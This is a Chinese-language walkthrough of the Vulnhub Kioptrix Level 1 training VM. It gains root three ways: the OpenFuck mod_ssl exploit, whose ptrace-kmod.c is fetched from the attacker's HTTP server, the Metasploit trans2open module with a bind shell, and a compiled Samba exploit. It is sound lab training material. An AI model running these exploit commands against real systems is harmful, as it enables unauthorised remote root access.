Vulnhub靶场 Kioptrix: Level 1 (#1) 练习

0x00 环境准备

下载链接：http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar

介绍：

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135

Source: http://www.kioptrix.com/blog/?p=49

下载完成解压，记事本打开VMX文件，删除“ethernet0”开头的行内容:

在这里插入图片描述

导入虚拟机，编辑虚拟机设置 —> 添加 —> 网络适配器，并设置为NAT：

在这里插入图片描述

0x01 主机信息收集

kali的IP地址：192.168.119.128

探索目标主机的IP：netdiscover -i eth0 -r 192.168.119.0/24

目标主机的IP：192.168.119.137

探测目标主机的开放端口：nmap -sV -p 1-65535 -A 192.168.119.137

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 14:50 CST
Nmap scan report for 192.168.119.137
Host is up (0.00063s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-12-04T07:53:16+00:00; +1h01m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-title: 400 Bad Request
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hopHost script results:
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms 192.168.119.137OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.80 seconds

开放了22端口，ssh服务，OpenSSH 2.9p2版本；80端口，Apache httpd 1.3.20；111端口，rpcbind；139端口，Samba smbd；443端口，Apache/1.3.20 (Unix) (Red-Hat/Linux) ，OpenSSL/0.9.6b；1024端口。

0x02 站点信息收集

访问80端口，是一个apache的测试页面：

在这里插入图片描述

探测站点目录：dirsearch -u 192.168.119.137

在这里插入图片描述

访问test.php并抓包，没有什么特殊的地方：

在这里插入图片描述

访问manual，找到了这个页面，有个版本mod_ssl version2.8，其实前面nmap就扫描出来这个信息了：

在这里插入图片描述

在usage页面也有个版本信息,webalizer version 2.01：

在这里插入图片描述

0x03 漏洞查找与利用

1. 方法一：mod_ssl 2.8.4

先用nikto扫描一下是否有可用的漏洞：nikto -h 192.168.119.137

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.119.137
+ Target Hostname:    192.168.119.137
+ Target Port:        80
+ Start Time:         2024-12-05 15:43:55 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 11:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2024-12-05 15:44:18 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

以上说明了几个版本都过时了，并且 mod_ssl/2.8.4存在缓冲区溢出漏洞可能会造成远程代码执行。

查找一下相关的漏洞：searchsploit mod_ssl 2.8.4

在这里插入图片描述

这里有三个文件，将这三个文件拷贝到当前目录下：

searchsploit -m unix/remote/21671.c ，searchsploit -m unix/remote/47080.c ，searchsploit -m unix/remote/764.c

在这里插入图片描述

编译脚本：gcc 21671.c -o a21671 ，gcc 47080.c -o b47080，gcc 764.c -o c764 ，都提示编译器找不到 openssl/ssl.h 头文件：

在这里插入图片描述

这个头文件是 OpenSSL 库的一部分，通常用于与 SSL/TLS 相关的操作。出现这个问题的原因通常是因为系统中没有安装 OpenSSL 的开发包，或者 OpenSSL 安装位置不在编译器的默认搜索路径中，在kali中安装：apt install libssl-dev

安装完成后再次分别执行上面的三条编译命令，只有47080.c编译是warning，其他两个都有error，但是47080编译提示了一些问题：

在这里插入图片描述

这里面有两个问题，一个是过时警告：使用的代码依赖于已经被弃用的加密算法和哈希函数，如 RC4、MD5 等，警告可以忽略。还有一个是链接错误：undefined reference to ... 表示编译器找不到某些函数的实现，通常是由于没有正确链接 OpenSSL 库或遗漏了某些必要的库文件，常见的 OpenSSL 库包括 libssl 和 libcrypto，可以通过在 gcc 命令中添加 -lssl 和 -lcrypto 来解决这个问题，执行命令：gcc 47080.c -o bbbb -lcrypto，没有错误提示并且生成了编译后的文件bbbb：

在这里插入图片描述

执行生成的文件：./bbbb

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************: Usage: ./bbbb target box [port] [-c N]target - supported box eg: 0x00box - hostname or IP addressport - port for ssl connection-c open N connections. (use range 40-50 if u dont know)Supported OffSet:0x00 - Caldera OpenLinux (apache-1.3.26)0x01 - Cobalt Sun 6.0 (apache-1.3.12)0x02 - Cobalt Sun 6.0 (apache-1.3.20)0x03 - Cobalt Sun x (apache-1.3.26)0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)0x05 - Conectiva 4 (apache-1.3.6)0x06 - Conectiva 4.1 (apache-1.3.9)0x07 - Conectiva 6 (apache-1.3.14)0x08 - Conectiva 7 (apache-1.3.12)0x09 - Conectiva 7 (apache-1.3.19)0x0a - Conectiva 7/8 (apache-1.3.26)0x0b - Conectiva 8 (apache-1.3.22)0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)0x0d - Debian GNU Linux (apache_1.3.19-1)0x0e - Debian GNU Linux (apache_1.3.22-2)0x0f - Debian GNU Linux (apache-1.3.22-2.1)0x10 - Debian GNU Linux (apache-1.3.22-5)0x11 - Debian GNU Linux (apache_1.3.23-1)0x12 - Debian GNU Linux (apache_1.3.24-2.1)0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)0x14 - Debian GNU Linux (apache_1.3.24-3)0x15 - Debian GNU Linux (apache-1.3.26-1)0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)0x17 - Debian GNU Linux (apache-1.3.27)0x18 - FreeBSD (apache-1.3.9)0x19 - FreeBSD (apache-1.3.11)0x1a - FreeBSD (apache-1.3.12.1.40)0x1b - FreeBSD (apache-1.3.12.1.40)0x1c - FreeBSD (apache-1.3.12.1.40)0x1d - FreeBSD (apache-1.3.12.1.40_1)0x1e - FreeBSD (apache-1.3.12)0x1f - FreeBSD (apache-1.3.14)0x20 - FreeBSD (apache-1.3.14)0x21 - FreeBSD (apache-1.3.14)0x22 - FreeBSD (apache-1.3.14)0x23 - FreeBSD (apache-1.3.14)0x24 - FreeBSD (apache-1.3.17_1)0x25 - FreeBSD (apache-1.3.19)0x26 - FreeBSD (apache-1.3.19_1)0x27 - FreeBSD (apache-1.3.20)0x28 - FreeBSD (apache-1.3.20)0x29 - FreeBSD (apache-1.3.20+2.8.4)0x2a - FreeBSD (apache-1.3.20_1)0x2b - FreeBSD (apache-1.3.22)0x2c - FreeBSD (apache-1.3.22_7)0x2d - FreeBSD (apache_fp-1.3.23)0x2e - FreeBSD (apache-1.3.24_7)0x2f - FreeBSD (apache-1.3.24+2.8.8)0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)0x31 - FreeBSD 4.6-Realease (apache-1.3.26)0x32 - FreeBSD (apache-1.3.27)0x33 - Gentoo Linux (apache-1.3.24-r2)0x34 - Linux Generic (apache-1.3.14)0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)0x39 - Mandrake Linux 7.2 (apache-1.3.14) 20x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)0x42 - Mandrake Linux 8.2 (apache-1.3.24)0x43 - Mandrake Linux 9 (apache-1.3.26)0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)0x45 - RedHat Linux TEST1 (apache-1.3.12-1)0x46 - RedHat Linux TEST2 (apache-1.3.12-1)0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)0x48 - RedHat Linux 4.2 (apache-1.1.3-3)0x49 - RedHat Linux 5.0 (apache-1.2.4-4)0x4a - RedHat Linux 5.1-Update (apache-1.2.6)0x4b - RedHat Linux 5.1 (apache-1.2.6-4)0x4c - RedHat Linux 5.2 (apache-1.3.3-1)0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)0x4e - RedHat Linux 6.0 (apache-1.3.6-7)0x4f - RedHat Linux 6.0 (apache-1.3.6-7)0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)0x51 - RedHat Linux 6.0 Update (apache-1.3.24)0x52 - RedHat Linux 6.1 (apache-1.3.9-4)10x53 - RedHat Linux 6.1 (apache-1.3.9-4)20x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)0x56 - RedHat Linux 6.2 (apache-1.3.12-2)10x57 - RedHat Linux 6.2 (apache-1.3.12-2)20x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)30x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)10x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)20x5b - Redhat Linux 7.x (apache-1.3.22)0x5c - RedHat Linux 7.x (apache-1.3.26-1)0x5d - RedHat Linux 7.x (apache-1.3.27)0x5e - RedHat Linux 7.0 (apache-1.3.12-25)10x5f - RedHat Linux 7.0 (apache-1.3.12-25)20x60 - RedHat Linux 7.0 (apache-1.3.14-2)0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)0x64 - RedHat Linux 7.1 (apache-1.3.19-5)10x65 - RedHat Linux 7.1 (apache-1.3.19-5)20x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)0x68 - RedHat Linux 7.1 (apache-1.3.22-src)0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)0x6a - RedHat Linux 7.2 (apache-1.3.20-16)10x6b - RedHat Linux 7.2 (apache-1.3.20-16)20x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)0x6d - RedHat Linux 7.2 (apache-1.3.24)0x6e - RedHat Linux 7.2 (apache-1.3.26)0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)10x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)20x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)0x73 - RedHat Linux 7.3 (apache-1.3.23-11)10x74 - RedHat Linux 7.3 (apache-1.3.23-11)20x75 - RedHat Linux 7.3 (apache-1.3.27)0x76 - RedHat Linux 8.0 (apache-1.3.27)0x77 - RedHat Linux 8.0-second (apache-1.3.27)0x78 - RedHat Linux 8.0 (apache-2.0.40)0x79 - Slackware Linux 4.0 (apache-1.3.6)0x7a - Slackware Linux 7.0 (apache-1.3.9)0x7b - Slackware Linux 7.0 (apache-1.3.26)0x7c - Slackware 7.0  (apache-1.3.26)20x7d - Slackware Linux 7.1 (apache-1.3.12)0x7e - Slackware Linux 8.0 (apache-1.3.20)0x7f - Slackware Linux 8.1 (apache-1.3.24)0x80 - Slackware Linux 8.1 (apache-1.3.26)0x81 - Slackware Linux 8.1-stable (apache-1.3.26)0x82 - Slackware Linux (apache-1.3.27)0x83 - SuSE Linux 7.0 (apache-1.3.12)0x84 - SuSE Linux 7.1 (apache-1.3.17)0x85 - SuSE Linux 7.2 (apache-1.3.19)0x86 - SuSE Linux 7.3 (apache-1.3.20)0x87 - SuSE Linux 8.0 (apache-1.3.23)0x88 - SUSE Linux 8.0 (apache-1.3.23-120)0x89 - SuSE Linux 8.0 (apache-1.3.23-137)0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)Fuck to all guys who like use lamah ddos. Read SRC to have no surprise

执行结果中给出了一些信息。这个工具是OpenFuck，基于 Openssl的。这个脚本的使用方法：./bbbb target box [port] [-c N]，其中 target 是下面的偏移量offset，box 是目标 ip，port 是目标端口（这里是https协议，443端口），-c 参数用来指定一个数值，链接的数量，不知道的话用 40-50 ，这里选择了大一点的数值50。

看下面支持的偏移量，是根据系统版本来选的，前面 nmap扫描出来如下信息：

443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b ，根据 Red-Hat 和 Apache 1.3.20 两个信息定位，发现 0x6a 和 0x6b 两个符合条件。

先用 0x6a 试一下：./bbbb 0x6a 192.168.119.137 443 -c 50

生成shell失败：

在这里插入图片描述

再试一下 0x6b，执行：./bbbb 0x6b 192.168.119.137 443 -c 50

看一下会报错：

在这里插入图片描述

提示目标主机上没有 ptrace-kmod.c 文件。可以看一下脚本的源码中关于 ptrace-kmod.c 这个文件的部分：cat -n 47080.c | grep ptrace

在这里插入图片描述

在 /tmp 目录中下载 ptrace-kmod.c ，再编译。可以考虑在kali中下载这个文件，然后传到目标主机的 tmp目录下。

在kali的当前目录中，下载这个文件：wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

利用python的http服务临时搭建：python2 -m SimpleHTTPServer 443

在这里插入图片描述

再利用编译生成的脚本 bbbb ，前面发现虽然攻击的时候报错了，但是可以执行一些命令，所以尝试一下。

先执行：./bbbb 0x6b 192.168.119.137 443 -c 50

在进入tmp目录：cd /tmp

下载文件：wget http://192.168.119.128:443/ptrace-kmod.c

在这里插入图片描述

可以看到已经被保存下来了。再次执行：./bbbb 0x6b 192.168.119.137 -c 50

在这里插入图片描述

获得了root权限。

2. 方法二：CVE-2003-0201

前面信息收集的时候，139端口有个Samba服务：

139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)

但是没有具体的版本信息，可以利用 msf 中的 smb_version 模块，扫描 samba的版本：

search smb_version
use 0
show options
set RHOSTS 192.168.119.137
run

在这里插入图片描述

Samba版本为2.2.1。

查找相关的可利用漏洞：searchsploit samba 2.2.1

在这里插入图片描述

第一个 trans2open Overflow (Metasploit)，是一个 rb 文件，ruby语言编写的，可以看一下文件内容，提示了CVE-2003-0201（还是一个关于openssl的漏洞），可以去 Metasploit 中利用：

search CVE-2003-0201
use 1    # 选linux版本的
show options
set RHOSTS 192.168.119.137
show payloads
set set payload linux/x86/shell/bind_tcp
run

在这里插入图片描述

3. 方法三：Samba

前面在 searchsploit 相关漏洞的时候第二条也是可以利用的，把这个脚本复制到当前目录下：searchsploit -m multiple/remote/10.c

编译这个文件：gcc 10.c -o samba

执行编译后的文件，查看如何使用：./samba

在这里插入图片描述

看几个重要参数：-p 指定端口，默认是139，这里就不用指定了。-b 指定平台版本，0代表Linux。最后加上ip地址。执行命令：./samba -b 0 192.168.119.137

在这里插入图片描述

0x04 总结

主机信息收集：

netdiscover探测目标主机ip。
nmap探测开放的端口和服务。

站点信息收集：

扫描站点目录。
从站点查看相关组件的版本信息。

漏洞利用：

方法一：mod_ssl 2.8.4
a. 利用 nikto 扫描是否有可用漏洞。
b. 编译脚本，处理报错。
方法二：CVE-2003-0201
a. 利用 msf 探测 samba 版本发现相关漏洞。
b. 在 msf 中利用该 CVE 进行攻击。
方法三：Samba
a. 利用 searchsploit 中的脚本进行攻击。